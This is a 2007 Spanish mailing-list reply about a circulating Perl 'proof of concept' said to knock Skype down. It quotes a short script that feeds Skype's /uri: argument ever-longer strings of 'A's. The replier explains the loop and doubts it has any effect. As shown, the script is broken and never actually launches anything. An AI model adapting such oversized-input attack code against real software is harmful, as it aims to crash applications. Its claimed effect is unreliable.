[eside-ghost] Preguntilla para los que saben de Perl...

Vie Ago 17 17:30:25 CEST 2007

Or, 2007eko Aburen 17a(e)an, Saúl Ibarra(e)k idatzi zuen:
> Hoola!
>
> Entre ayer y hoy ha saltado la noticia de que Skype se ha caido (cosa
> de la que me alegro, pero eso es aparte) y tal, y se ha propagado una
> prueba de concepto del supuesto ataque DoS, que viene a ser:
>
>      #!/usr/bin/perl
>     # Simle Code by Maranax Porex ;D
>     # Ya Skaypeg!!
>
>     for ($i=256; $i>xCCCCC; $i=$i+256){
>     $eot='AAAA' x $i;
>     call_sp();
>     }
>     exit;
>
>     sub call_sp(){
>     $str="\"C:\\Program Files\\Skype\\Phone\\Skype.exe\" \"/uri:$eot\"";
>     }
>
> Mayormente no se muy bien que hace el codigo, pero en la ultima linea
> e puesto un print de $eot y no veo mas que Aes, cosa normal.
>
> Mi idea es que se produce un buffer overflow o asi, pero de ahi a
> tumbar servidores...
>
> Por otro lado... si alguno me explicais que hace el for ese os lo
> agradeceria, porque no entiendo eso de $i>xCCCCC y la asignacion a
> $eot...

Basicamente lo que hace es llamar continuamente a Skype con diferente numero 
de 'A's como parametro del URI: 1024, 2048, etc.

No tengo ni idea de cómo funciona skype, pero aunque sí que se comenta que es 
un protocolo bastante inseguro, dudo muchísimo que ese tenga algún efecto (a 
no ser que los de skype sean unos cazurros de primera, cosa que dudo), aparte 
de sobrecargarte el equipo porque lanzas muchos skypes.

Aio
-- 
Alfredo Beaumont Sainz
http://www.alfredobeaumont.org/blog.cgi